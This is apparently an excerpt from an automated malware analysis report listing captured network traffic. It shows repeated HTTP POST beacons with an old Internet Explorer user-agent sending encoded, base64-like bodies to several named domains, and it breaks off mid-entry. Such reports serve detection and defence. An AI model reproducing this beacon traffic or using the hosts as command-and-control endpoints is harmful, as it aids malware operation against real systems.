4c 4b 48 56 4d 6a 49 71 42 71 49 66 55 35 55 42 64 65 43 6a 74 36 51 2b 6e 44 43 67 58 6d 44 4b 66 52 2f 31 6f 69 76 43 6f 51 57 30 59 50 4e 34 38 79 6e 47 63 76 77 77 32 45 53 62 6f 31 52 54 6d 6b 2f 44 44 54 49 78 65 72 72 39 7a 74 77 57 48 71 69 58 4b 79 51 43 36 58 73 43 70 37 76 51 2f 36 6e 77 2b 4b 33 65 5a 47 56 43 50 30 51 4e 61 6f 4d 34 2f 42 5a 7a 49 71 65 79 57 36 2b 53 43 4d 64 48 38 38 50 50 38 63 38 49 31 6c 7a 2f 43 78 51 49 4f 6a 75 6d 48 39 43 4c 37 57 7a 43 2f 64 74 64 30 74 34 2f 6f 2b 49 50 67 57 68 51 41 46 6b 42 45 57 30 58 49 45 61 45 58 55 73 76 50 32 58 7a 64 2f 32 52 77 50 46 45 34 33 33 52 63 4c 64 56 48 70 7a 56 64 49 6c 6a 2f 36 7a 50 72 31 47 2b 31 39 57 56 49 4e 48 58 43 30 75 4b 37 74 4c 78 2b 57 5a 70 56 2f 37 36 6c 37 4b 46 32 65 33 4f 52 41 75 39 56 2f 63 55 76 43 72 72 75 36 41 6d 64 78 45 4a 33 64 56 6e 31 4e 2b 6c 58 32 39 37 6b 4e 7a 6d 2f 33 71 6a 6b 58 63 32 42 32 74 73 59 73 6f 41 72 49 44 4a 64 33 63 79 65 38 4d 6c 4b 32 65 4b 49 32 2f 4f 4a 34 4e 38 43 32 4a 68 34 44 71 63 50 59 73 56 35 42 50 4b 67 67 73 49 6b 63 64 35 42 67 6b 76 68 51 43 67 52 65 71 76 71 4b 6f 35 69 54 77 6f 71 69 68 61 62 55 35 4e 50 42 32 54 65 54 2f 48 32 68 39 76 45 6e 51 43 5a 59 30 65 77 3d Data Ascii: dK6OZIwX9Jaj65fT9+3hdJ8GimFkS7ahgFmleXq5x5ksXgk2Z19zGt1CHMYmhHC5lnAeCWyc/i/ApkG9b7KzvM3jG5jsw9GgHM/07WGmSHb+uKpHf4NVFLdQe2PLe/e5LCQKVhltJc+tn9OB7txiNmUBYAKEE/Y12YD6Yl+NCTnE2//4VWKlmrLKHVMjIqBqIfU5UBdeCjt6Q+nDCgXmDKfR/1oivCoQW0YPN48ynGcvww2ESbo1RTmk/DDTIxerr9ztwWHqiXKyQC6XsCp7vQ/6nw+K3eZGVCP0QNaoM4/BZzIqeyW6+SCMdH88PP8c8I1lz/CxQIOjumH9CL7WzC/dtd0t4/o+IPgWhQAFkBEW0XIEaEXUsvP2Xzd/2RwPFE433RcLdVHpzVdIlj/6zPr1G+19WVINHXC0uK7tLx+WZpV/76l7KF2e3ORAu9V/cUvCrru6AmdxEJ3dVn1N+lX297kNzm/3qjkXc2B2tsYsoArIDJd3cye8MlK2eKI2/OJ4N8C2Jh4DqcPYsV5BPKggsIkcd5BgkvhQCgReqvqKo5iTwoqihabU5NPB2TeT/H2h9vEnQCZY0ew=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 64 4b 36 4f 5a 49 77 58 39 4a 61 6a 36 35 66 54 39 2b 33 68 64 4a 38 47 69 6d 46 6b 53 37 61 68 67 46 6d 6c 65 58 71 35 78 35 6b 73 58 67 6b 32 5a 31 39 7a 47 74 31 43 48 4d 59 6d 68 48 43 35 6c 6e 41 65 43 57 79 63 2f 69 2f 41 70 6b 47 39 62 37 4b 7a 76 4d 33 6a 47 35 6a 73 77 39 47 67 48 4d 2f 30 37 57 47 6d 53 48 62 2b 75 4b 70 48 66 34 4e 56 46 4c 64 51 65 32 50 4c 65 2f 65 35 4c 43 51 4b 56 68 6c 74 4a 63 2b 74 6e 39 4f 42 37 74 78 69 4e 6d 55 42 59 41 4b 45 45 2f 59 31 32 59 44 36 59 6c 2b 4e 43 54 6e 45 32 2f 2f 34 56 57 4b 6c 6d 72 4c 4b 48 56 4d 6a 49 71 42 71 49 66 55 35 55 42 64 65 43 6a 74 36 51 2b 6e 44 43 67 58 6d 44 4b 66 52 2f 31 6f 69 76 43 6f 51 57 30 59 50 4e 34 38 79 6e 47 63 76 77 77 32 45 53 62 6f 31 52 54 6d 6b 2f 44 44 54 49 78 65 72 72 39 7a 74 77 57 48 71 69 58 4b 79 51 43 36 58 73 43 70 37 76 51 2f 36 6e 77 2b 4b 33 65 5a 47 56 43 50 30 51 4e 61 6f 4d 34 2f 42 5a 7a 49 71 65 79 57 36 2b 53 43 4d 64 48 38 38 50 50 38 63 38 49 31 6c 7a 2f 43 78 51 49 4f 6a 75 6d 48 39 43 4c 37 57 7a 43 2f 64 74 64 30 74 34 2f 6f 2b 49 50 67 57 68 51 41 46 6b 42 45 57 30 58 49 45 61 45 58 55 73 76 50 32 58 7a 64 2f 32 52 77 50 46 45 34 33 33 52 63 4c 64 56 48 70 7a 56 64 49 6c 6a 2f 36 7a 50 72 31 47 2b 31 39 57 56 49 4e 48 58 43 30 75 4b 37 74 4c 78 2b 57 5a 70 56 2f 37 36 6c 37 4b 46 32 65 33 4f 52 41 75 39 56 2f 63 55 76 43 72 72 75 36 41 6d 64 78 45 4a 33 64 56 6e 31 4e 2b 6c 58 32 39 37 6b 4e 7a 6d 2f 33 71 6a 6b 58 63 32 42 32 74 73 59 73 6f 41 72 49 44 4a 64 33 63 79 65 38 4d 6c 4b 32 65 4b 49 32 2f 4f 4a 34 4e 38 43 32 4a 68 34 44 71 63 50 59 73 56 35 42 50 4b 67 67 73 49 6b 63 64 35 42 67 6b 76 68 51 43 67 52 65 71 76 71 4b 6f 35 69 54 77 6f 71 69 68 61 62 55 35 4e 50 42 32 54 65 54 2f 48 32 68 39 76 45 6e 51 43 5a 59 30 65 77 3d Data Ascii: dK6OZIwX9Jaj65fT9+3hdJ8GimFkS7ahgFmleXq5x5ksXgk2Z19zGt1CHMYmhHC5lnAeCWyc/i/ApkG9b7KzvM3jG5jsw9GgHM/07WGmSHb+uKpHf4NVFLdQe2PLe/e5LCQKVhltJc+tn9OB7txiNmUBYAKEE/Y12YD6Yl+NCTnE2//4VWKlmrLKHVMjIqBqIfU5UBdeCjt6Q+nDCgXmDKfR/1oivCoQW0YPN48ynGcvww2ESbo1RTmk/DDTIxerr9ztwWHqiXKyQC6XsCp7vQ/6nw+K3eZGVCP0QNaoM4/BZzIqeyW6+SCMdH88PP8c8I1lz/CxQIOjumH9CL7WzC/dtd0t4/o+IPgWhQAFkBEW0XIEaEXUsvP2Xzd/2RwPFE433RcLdVHpzVdIlj/6zPr1G+19WVINHXC0uK7tLx+WZpV/76l7KF2e3ORAu9V/cUvCrru6AmdxEJ3dVn1N+lX297kNzm/3qjkXc2B2tsYsoArIDJd3cye8MlK2eKI2/OJ4N8C2Jh4DqcPYsV5BPKggsIkcd5BgkvhQCgReqvqKo5iTwoqihabU5NPB2TeT/H2h9vEnQCZY0ew=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 46 2f 71 61 62 6f 34 4c 42 5a 66 54 54 6e 32 54 47 52 30 70 43 2f 48 54 32 78 4b 4f 56 4b 35 48 6f 71 52 67 4e 76 47 6c 6b 32 74 73 48 55 65 51 30 55 77 57 52 4b 39 42 2f 75 4a 35 6a 42 71 74 76 2f 5a 73 50 39 61 6e 38 46 32 72 50 77 6b 54 66 62 4d 78 50 30 35 51 62 4e 30 68 59 47 66 74 4d 74 71 4e 32 41 51 4d 69 4f 46 52 34 54 58 6e 74 65 69 46 66 37 77 43 68 72 6e 4a 46 42 51 66 43 2b 71 37 35 72 31 46 72 71 41 45 6f 77 77 43 2b 4b 37 73 6a 75 6c 53 34 56 50 7a 45 62 30 2b 59 45 39 59 4c 2b 6f 44 44 52 51 48 65 6a 56 45 66 68 78 37 71 6e 34 44 45 38 54 68 54 38 72 2f 48 31 50 55 43 50 57 44 41 2b 46 6e 6d 56 71 30 53 5a 33 57 64 65 64 67 30 6a 33 78 30 7a 63 4b 4e 45 45 79 42 68 4d 4e 50 4b 5a 51 31 62 64 76 36 2b 45 72 58 30 6c 4b 38 35 67 63 73 46 64 4e 4b 69 38 78 32 54 64 79 39 33 70 73 64 42 30 34 65 44 79 34 57 34 75 6f 4d 72 48 6a 30 64 52 64 48 6a 6e 5a 76 32 66 4e 43 62 34 47 55 4a 4a 56 50 4e 6f 44 47 32 4c 31 5a 50 31 37 70 62 32 33 6d 6e 4e 79 45 33 63 36 52 43 6e 46 73 6f 65 57 6b 4b 4c 76 61 4b 33 52 79 79 4f 65 43 69 53 77 33 50 31 2f 64 2b 37 42 63 4f 58 42 34 35 35 49 54 39 6a 75 52 51 46 41 4c 44 77 73 31 43 5a 32 36 77 4a 52 74 77 4e 4d 69 6b 39 43 66 39 4d 37 57 31 33 52 53 51 4e 31 57 49 78 44 6f 56 4b 66 72 52 69 43 62 42 36 59 2b 65 6e 6c 4a 50 4b 68 32 6f 5a 47 42 64 57 5a 71 35 4b 49 39 64 70 48 61 44 4f 43 41 78 4f 31 61 42 6b 62 7a 75 41 53 46 4e 6a 64 55 34 33 59 54 6e 39 39 6a 31 48 6d 68 48 69 44 4e 61 77 30 73 57 70 70 47 62 73 77 54 6c 2f 44 41 34 48 62 72 4f 68 49 4c 4a 4b 79 75 6e 76 79 78 64 74 49 59 65 32 65 46 4a 38 69 53 33 71 4f 4c 41 54 67 50 4a 54 44 66 2b 30 39 79 4e 4e 79 48 42 4f 41 37 4e 44 65 36 51 3d 3d Data Ascii: F/qabo4LBZfTTn2TGR0pC/HT2xKOVK5HoqRgNvGlk2tsHUeQ0UwWRK9B/uJ5jBqtv/ZsP9an8F2rPwkTfbMxP05QbN0hYGftMtqN2AQMiOFR4TXnteiFf7wChrnJFBQfC+q75r1FrqAEowwC+K7sjulS4VPzEb0+YE9YL+oDDRQHejVEfhx7qn4DE8ThT8r/H1PUCPWDA+FnmVq0SZ3Wdedg0j3x0zcKNEEyBhMNPKZQ1bdv6+ErX0lK85gcsFdNKi8x2Tdy93psdB04eDy4W4uoMrHj0dRdHjnZv2fNCb4GUJJVPNoDG2L1ZP17pb23mnNyE3c6RCnFsoeWkKLvaK3RyyOeCiSw3P1/d+7BcOXB455IT9juRQFALDws1CZ26wJRtwNMik9Cf9M7W13RSQN1WIxDoVKfrRiCbB6Y+enlJPKh2oZGBdWZq5KI9dpHaDOCAxO1aBkbzuASFNjdU43YTn99j1HmhHiDNaw0sWppGbswTl/DA4HbrOhILJKyunvyxdtIYe2eFJ8iS3qOLATgPJTDf+09yNNyHBOA7NDe6Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 63 4a 38 54 62 33 63 50 42 5a 63 67 5a 4e 35 66 35 69 5a 35 62 73 41 67 50 74 34 74 39 55 69 73 6d 39 49 4b 52 47 4d 6c 54 56 4e 71 55 46 74 30 54 74 35 59 78 4c 51 34 7a 62 58 6b 74 56 41 36 36 54 46 67 4b 2b 76 34 6c 4d 46 6b 77 68 36 55 76 4c 4e 73 48 61 31 70 2b 75 54 45 35 34 30 39 78 66 72 49 50 38 41 73 56 39 34 65 32 4b 78 6f 77 53 48 68 46 31 35 72 37 75 59 6e 45 4f 6e 4a 54 73 38 41 4e 63 30 5a 6b 35 72 43 74 74 5a 34 73 66 65 49 2b 6d 4d 75 6d 69 50 61 38 78 42 50 78 38 36 4f 44 61 69 33 38 61 6c 77 6d 49 79 49 36 39 61 2b 58 7a 58 41 6c 6c 61 32 69 6b 49 50 63 58 63 78 51 42 2b 4b 59 32 70 4a 77 72 39 67 56 48 69 45 2f 32 49 4d 49 42 78 6a 4b 49 4c 38 67 38 5a 6e 66 62 66 51 42 35 63 35 57 57 6e 2b 4c 75 5a 48 78 56 42 71 73 31 31 5a 50 79 35 47 53 56 73 78 4f 46 6b 6d 48 73 49 41 70 67 62 6e 4d 35 4d 61 4b 34 33 45 74 4a 42 50 36 44 67 48 72 70 37 42 63 52 4a 49 37 41 75 69 69 6f 4c 61 71 37 52 5a 78 72 36 78 73 38 48 53 69 61 61 48 64 6f 45 66 45 4d 4e 42 6a 68 42 56 64 35 62 49 53 58 64 75 5a 37 4c 37 31 6e 57 68 69 42 73 39 7a 4f 4b 4f 6f 58 45 63 4a 49 49 6e 51 79 30 39 54 62 6c 66 78 4d 39 75 51 30 56 6c 46 35 69 43 64 37 53 63 31 6c 35 79 48 34 44 66 6f 59 39 65 33 49 47 42 39 35 71 75 56 45 54 30 42 43 4c 74 43 77 51 72 44 56 55 70 37 47 6d 7a 46 32 53 66 4a 48 49 36 50 67 37 34 6d 46 48 62 35 69 7a 2b 6e 6a 33 46 48 44 50 31 69 31 36 48 37 59 63 72 78 6b 31 62 70 7a 69 76 45 56 2b 56 57 6c 4b 4c 61 76 2b 4c 4f 67 43 39 4d 2b 41 77 66 79 53 44 64 33 59 4a 32 4c 74 61 6a 44 59 39 6e 32 43 41 61 32 6e 4e 4f 6b 6b 70 62 36 45 3d Data Ascii: cJ8Tb3cPBZcgZN5f5iZ5bsAgPt4t9Uism9IKRGMlTVNqUFt0Tt5YxLQ4zbXktVA66TFgK+v4lMFkwh6UvLNsHa1p+uTE5409xfrIP8AsV94e2KxowSHhF15r7uYnEOnJTs8ANc0Zk5rCttZ4sfeI+mMumiPa8xBPx86ODai38alwmIyI69a+XzXAlla2ikIPcXcxQB+KY2pJwr9gVHiE/2IMIBxjKIL8g8ZnfbfQB5c5WWn+LuZHxVBqs11ZPy5GSVsxOFkmHsIApgbnM5MaK43EtJBP6DgHrp7BcRJI7AuiioLaq7RZxr6xs8HSiaaHdoEfEMNBjhBVd5bISXduZ7L71nWhiBs9zOKOoXEcJIInQy09TblfxM9uQ0VlF5iCd7Sc1l5yH4DfoY9e3IGB95quVET0BCLtCwQrDVUp7GmzF2SfJHI6Pg74mFHb5iz+nj3FHDP1i16H7Ycrxk1bpzivEV+VWlKLav+LOgC9M+AwfySDd3YJ2LtajDY9n2CAa2nNOkkpb6E=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 7a 2f 4d 55 64 72 64 4a 42 5a 65 6f 41 7a 44 55 4a 70 76 78 4e 51 43 56 55 33 46 74 62 50 45 4b 32 35 44 37 51 4e 45 43 76 64 4a 7a 7a 59 6a 6f 48 6e 66 34 6c 48 7a 61 71 66 59 55 34 4e 70 62 57 67 4c 51 77 43 41 4e 6d 66 73 67 69 70 69 6b 77 36 79 49 42 70 4c 67 63 4f 79 62 66 73 45 39 72 7a 67 36 58 79 44 52 79 44 39 64 68 57 43 76 36 62 4d 55 5a 4b 37 42 55 76 50 4c 62 62 4e 73 77 77 69 5a 73 32 61 69 7a 32 50 70 58 54 33 69 41 36 46 4e 30 69 70 69 47 4c 55 44 33 71 79 48 30 30 69 77 61 39 4d 41 72 55 6f 34 52 44 4b 5a 76 77 4c 7a 7a 70 70 32 66 33 76 50 2b 5a 61 67 4b 49 43 61 61 6a 65 74 7a 2f 68 49 66 46 4e 38 35 42 46 31 44 56 6f 31 41 2b 4b 64 36 79 53 6d 45 6a 75 72 4d 76 49 42 65 75 4f 57 52 6b 6f 75 36 78 51 58 4e 78 52 6b 74 6c 56 61 55 72 67 37 75 57 54 58 7a 6c 79 71 41 43 5a 7a 6b 79 59 50 78 78 51 2b 71 2b 57 62 41 4e 43 41 6d 5a 49 4e 54 52 56 6f 6c 69 56 47 35 6f 59 45 65 4e 76 53 74 77 4c 4e 4b 33 72 50 47 4d 4c 59 49 2b 56 7a 2f 55 34 70 33 77 48 61 75 36 4c 6e 56 4f 4d 5a 34 54 4f 77 63 47 6e 37 46 30 6f 4e 50 36 53 64 51 42 69 4d 35 74 6b 51 50 54 6a 6c 32 78 2b 36 5a 6a 59 4c 52 6c 63 42 41 46 59 36 75 31 76 77 33 54 4a 56 7a 35 62 75 30 61 41 55 33 67 58 4c 52 6e 52 6b 54 45 6e 32 62 55 65 30 6e 34 51 7a 6e 77 62 5a 44 43 4b 6f 65 68 55 4e 30 73 38 54 38 68 48 44 63 69 73 50 79 2f 66 45 6b 32 33 58 62 73 35 62 33 75 72 6e 43 73 6c 75 79 4e 71 2b 58 49 6f 75 4c 41 59 75 4d 61 31 31 70 6d 74 38 35 61 61 70 4a 33 44 39 36 6d 64 53 49 35 67 78 46 5a 43 37 63 55 30 49 38 6b 61 59 57 5a 51 79 55 43 62 75 61 7a 4d 58 50 64 75 38 56 30 67 4e 54 50 6b 34 6e 70 56 38 49 75 67 6e 36 6b 51 77 65 2b 69 75 49 71 64 74 51 53 49 4f 58 42 4b 61 2f 34 56 2b 73 4b 67 3d Data Ascii: z/MUdrdJBZeoAzDUJpvxNQCVU3FtbPEK25D7QNECvdJzzYjoHnf4lHzaqfYU4NpbWgLQwCANmfsgipikw6yIBpLgcOybfsE9rzg6XyDRyD9dhWCv6bMUZK7BUvPLbbNswwiZs2aiz2PpXT3iA6FN0ipiGLUD3qyH00iwa9MArUo4RDKZvwLzzpp2f3vP+ZagKICaajetz/hIfFN85BF1DVo1A+Kd6ySmEjurMvIBeuOWRkou6xQXNxRktlVaUrg7uWTXzlyqACZzkyYPxxQ+q+WbANCAmZINTRVoliVG5oYEeNvStwLNK3rPGMLYI+Vz/U4p3wHau6LnVOMZ4TOwcGn7F0oNP6SdQBiM5tkQPTjl2x+6ZjYLRlcBAFY6u1vw3TJVz5bu0aAU3gXLRnRkTEn2bUe0n4QznwbZDCKoehUN0s8T8hHDcisPy/fEk23Xbs5b3urnCsluyNq+XIouLAYuMa11pmt85aapJ3D96mdSI5gxFZC7cU0I8kaYWZQyUCbuazMXPdu8V0gNTPk4npV8Iugn6kQwe+iuIqdtQSIOXBKa/4V+sKg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 44 61 77 32 66 4f 33 4d 44 5a 63 52 56 79 48 51 35 4d 6e 74 61 71 61 66 36 52 50 62 46 6d 75 35 63 65 53 35 33 6a 33 30 6e 70 47 73 48 61 35 6b 5a 41 37 39 6f 32 70 6a 6a 68 6b 48 55 6e 71 71 48 66 34 62 50 41 47 38 4b 55 6c 57 77 74 68 71 4d 41 62 68 78 32 37 46 37 5a 56 2f 62 70 66 53 33 4d 68 6a 38 6a 63 77 42 62 53 71 43 5a 64 68 34 4e 72 47 41 69 6d 6d 51 41 57 31 6c 65 38 6e 75 50 66 6f 5a 61 39 41 37 53 2f 73 54 74 42 32 2b 37 37 33 6a 61 51 68 38 42 62 45 55 62 76 37 66 43 67 46 45 4f 6b 49 74 62 65 51 5a 77 41 36 6e 4e 72 76 45 75 74 52 69 2b 79 47 31 51 76 70 6e 48 34 34 63 31 44 2b 77 45 52 34 77 43 72 68 64 4c 34 7a 76 6a 36 4f 6e 62 2f 63 4c 2f 7a 46 58 59 61 2f 35 62 62 33 51 39 7a 47 31 48 56 42 6c 70 5a 62 47 36 4c 7a 63 63 77 37 48 43 73 56 4e 30 7a 66 36 65 68 33 63 68 70 50 71 75 4d 4f 36 7a 2f 35 55 52 35 37 47 76 33 71 58 7a 2b 44 4a 69 35 6d 71 50 62 48 5a 77 51 6f 50 56 41 67 66 59 39 69 79 70 37 36 47 37 61 58 30 78 37 37 2f 69 5a 37 35 69 59 70 77 42 64 34 49 44 77 59 6e 51 70 49 55 52 54 65 56 55 45 4a 37 64 54 6e 45 69 4b 4d 48 30 76 53 51 34 35 43 47 67 6d 7a 68 38 35 43 44 30 6f 39 63 73 4d 45 2f 51 73 34 45 6e 6b 49 6a 72 62 5a 54 70 4e 6f 68 4e 6f 42 42 67 56 4c 4c 67 30 45 69 65 45 67 63 7a 36 33 4f 55 67 54 2b 70 36 4f 76 68 61 72 77 35 63 4f 6e 30 63 6c 37 47 6a 61 6d 38 43 38 4d 74 6e 61 30 51 55 77 52 43 58 37 31 4c 5a 31 2b 2f 4a 6f 39 4c 45 50 33 46 6b 2b 4b 61 34 2f 64 42 52 34 51 51 56 72 48 4b 64 34 38 31 66 78 47 33 45 43 79 2b 48 44 34 33 7a 6d 39 4a 35 69 65 63 5a 55 67 76 4c 67 45 6d 31 79 6f 58 54 37 63 65 57 5a 67 42 67 36 59 6c 79 68 45 2f 71 63 47 4d 49 68 77 53 70 43 62 55 43 53 77 73 6f 36 33 66 36 32 59 4b 65 43 36 58 6c 31 Data Ascii: Daw2fO3MDZcRVyHQ5Mntaqaf6RPbFmu5ceS53j30npGsHa5kZA79o2pjjhkHUnqqHf4bPAG8KUlWwthqMAbhx27F7ZV/bpfS3Mhj8jcwBbSqCZdh4NrGAimmQAW1le8nuPfoZa9A7S/sTtB2+773jaQh8BbEUbv7fCgFEOkItbeQZwA6nNrvEutRi+yG1QvpnH44c1D+wER4wCrhdL4zvj6Onb/cL/zFXYa/5bb3Q9zG1HVBlpZbG6Lzccw7HCsVN0zf6eh3chpPquMO6z/5UR57Gv3qXz+DJi5mqPbHZwQoPVAgfY9iyp76G7aX0x77/iZ75iYpwBd4IDwYnQpIURTeVUEJ7dTnEiKMH0vSQ45CGgmzh85CD0o9csME/Qs4EnkIjrbZTpNohNoBBgVLLg0EieEgcz63OUgT+p6Ovharw5cOn0cl7Gjam8C8Mtna0QUwRCX71LZ1+/Jo9LEP3Fk+Ka4/dBR4QQVrHKd481fxG3ECy+HD43zm9J5iecZUgvLgEm1yoXT7ceWZgBg6YlyhE/qcGMIhwSpCbUCSwso63f62YKeC6Xl1
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 74 64 6f 62 6c 61 70 4c 42 70 65 58 73 4a 54 58 6a 59 65 41 7a 57 30 32 32 52 44 61 7a 4f 58 41 66 6a 41 71 6f 56 4c 38 53 79 32 4f 6b 2f 30 53 2b 75 68 66 72 4c 69 55 4e 42 6e 73 58 76 34 38 2b 30 38 4e 38 49 63 66 38 43 33 77 4f 4e 32 67 43 32 63 53 68 2f 47 56 79 36 76 55 4a 73 6c 75 70 33 68 67 74 75 34 6a 37 62 54 37 4e 4f 45 62 44 42 51 2b 76 69 41 35 31 30 78 4d 4c 61 65 34 5a 67 4a 30 35 35 30 6f 31 63 49 46 5a 41 4e 30 39 62 45 6e 78 6b 49 7a 65 59 38 72 52 34 78 37 64 53 78 53 7a 6c 7a 6b 6b 2f 65 54 5a 6c 46 4b 51 47 6a 63 32 63 42 6c 73 36 73 70 5a 75 47 47 37 49 6c 43 65 58 65 50 74 43 4c 4a 2f 53 4a 79 78 44 32 49 4a 79 5a 6f 75 6e 58 56 4b 7a 57 58 68 4d 39 36 37 76 4c 43 47 30 43 43 6c 32 36 6c 6a 37 44 75 58 38 34 48 56 73 70 67 75 2f 67 57 79 56 50 49 43 64 47 52 44 78 7a 69 38 6a 62 44 6e 62 59 67 31 2f 66 41 46 49 6e 6f 58 6a 7a 46 42 4a 75 75 37 57 6d 54 37 2f 4e 33 59 35 79 76 52 4e 6f 44 42 71 6e 5a 46 73 66 72 62 49 68 75 42 43 63 43 64 34 59 47 55 31 2b 47 62 63 32 37 2b 50 4c 52 59 61 42 35 59 6e 73 32 4a 72 31 79 75 4c 6d 37 33 43 44 44 62 63 36 48 6f 74 54 51 59 46 71 64 6e 65 50 43 4a 63 50 50 53 68 50 44 55 4e 30 49 73 61 75 77 61 67 49 71 45 76 4e 34 42 35 50 72 4b 7a 30 6e 5a 79 6b 56 64 62 2f 69 37 4d 44 4e 4e 2b 78 6a 51 62 31 35 30 37 2b 55 59 4d 47 64 51 51 51 67 6a 53 32 70 51 61 6d 6c 31 45 47 7a 36 58 4e 65 46 63 42 76 79 41 79 79 6f 56 31 56 4e 71 46 52 75 55 32 52 30 77 49 33 56 42 6d 72 32 6c 57 52 67 49 4c 36 71 6d 46 34 63 56 7a 53 65 75 53 5a 4e 33 4c 70 33 6c 38 58 75 7a 53 4d 39 6e 66 71 71 47 75 4b 47 2f 6d 76 4f 6d 73 65 48 79 73 74 2b 41 55 57 72 50 42 54 2f 36 61 30 6d 76 6b 4b 42 46 2f 69 48 71 6a 4c 77 6f 57 67 70 43 6b 6f 68 71 49 3d Data Ascii: tdoblapLBpeXsJTXjYeAzW022RDazOXAfjAqoVL8Sy2Ok/0S+uhfrLiUNBnsXv48+08N8Icf8C3wON2gC2cSh/GVy6vUJslup3hgtu4j7bT7NOEbDBQ+viA510xMLae4ZgJ0550o1cIFZAN09bEnxkIzeY8rR4x7dSxSzlzkk/eTZlFKQGjc2cBls6spZuGG7IlCeXePtCLJ/SJyxD2IJyZounXVKzWXhM967vLCG0CCl26lj7DuX84HVspgu/gWyVPICdGRDxzi8jbDnbYg1/fAFInoXjzFBJuu7WmT7/N3Y5yvRNoDBqnZFsfrbIhuBCcCd4YGU1+Gbc27+PLRYaB5Yns2Jr1yuLm73CDDbc6HotTQYFqdnePCJcPPShPDUN0IsauwagIqEvN4B5PrKz0nZykVdb/i7MDNN+xjQb1507+UYMGdQQQgjS2pQaml1EGz6XNeFcBvyAyyoV1VNqFRuU2R0wI3VBmr2lWRgIL6qmF4cVzSeuSZN3Lp3l8XuzSM9nfqqGuKG/mvOmseHyst+AUWrPBT/6a0mvkKBF/iHqjLwoWgpCkohqI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 37 6d 54 67 66 48 44 53 44 5a 66 78 63 68 32 6d 67 30 50 72 39 69 4e 58 6b 41 38 59 75 67 44 5a 70 44 43 67 47 55 39 54 49 70 53 6d 42 74 67 4e 34 36 53 69 42 66 34 42 4b 5a 6b 54 66 4e 67 77 62 37 44 72 58 41 43 78 33 71 62 39 6c 76 59 54 59 7a 38 45 6a 77 39 30 70 49 5a 78 6b 62 39 61 49 65 32 71 49 75 4c 4a 6e 4b 68 57 50 47 64 38 49 47 39 4b 53 51 55 4c 47 73 71 73 55 68 6e 48 45 4e 56 78 54 55 6a 6e 43 58 34 6e 45 32 52 45 68 39 42 4d 35 4f 45 79 51 4c 41 74 62 6e 77 55 2b 70 45 58 44 36 41 4e 43 78 2b 7a 6a 68 39 35 4d 36 46 31 2b 6e 51 53 38 31 74 41 37 6d 32 4d 42 34 30 73 5a 43 4d 37 32 38 69 72 39 72 55 72 51 66 46 45 5a 52 73 4c 65 72 69 34 56 6c 4c 32 44 6c 66 67 38 38 69 2b 48 7a 67 74 2b 63 64 57 49 52 42 32 34 57 6d 42 32 67 48 6c 33 67 37 31 31 47 62 4a 42 79 64 57 34 75 62 2b 6f 59 42 43 75 6a 62 65 6c 33 4e 43 67 52 55 74 4d 44 2f 71 33 66 69 61 4a 6d 38 32 30 5a 44 59 69 4c 58 6b 45 75 5a 6f 69 36 45 37 55 5a 76 6a 61 4d 57 7a 73 6c 63 63 75 32 76 74 39 49 72 67 4c 2f 46 48 4a 4e 76 6d 6a 46 57 7a 55 56 68 51 54 56 4b 4f 67 34 78 6b 6d 58 56 4e 56 2f 47 57 4f 66 4e 5a 74 6f 66 78 4e 51 34 64 59 49 73 43 37 69 4a 58 64 53 64 4d 65 45 43 65 36 66 41 2b 33 33 76 4f 38 7a 4a 51 59 42 6d 30 57 34 6f 64 2f 52 4f 6d 47 30 48 2b 4c 7a 66 31 55 61 74 4e 38 2b 63 72 50 57 78 4f 4b 58 2b 4f 37 50 30 6b 36 5a 75 41 54 31 36 58 73 53 51 50 65 6c 73 51 46 70 46 54 35 4b 6b 52 65 68 78 79 44 77 56 6d 4e 4c 6c 52 6f 76 6c 57 4d 6d 61 73 4c 42 6f 74 77 51 6f 74 56 4a 77 2f 76 4c 6f 61 39 6e 45 5a 4b 58 61 53 6c 35 39 49 67 6e 35 4e 37 6f 46 6d 70 2b 6a 50 72 4f 54 6c 61 69 67 4d 4d 32 4c 44 4b 50 6f 42 51 6a 6e 55 49 35 30 54 53 54 6a 77 Data Ascii: 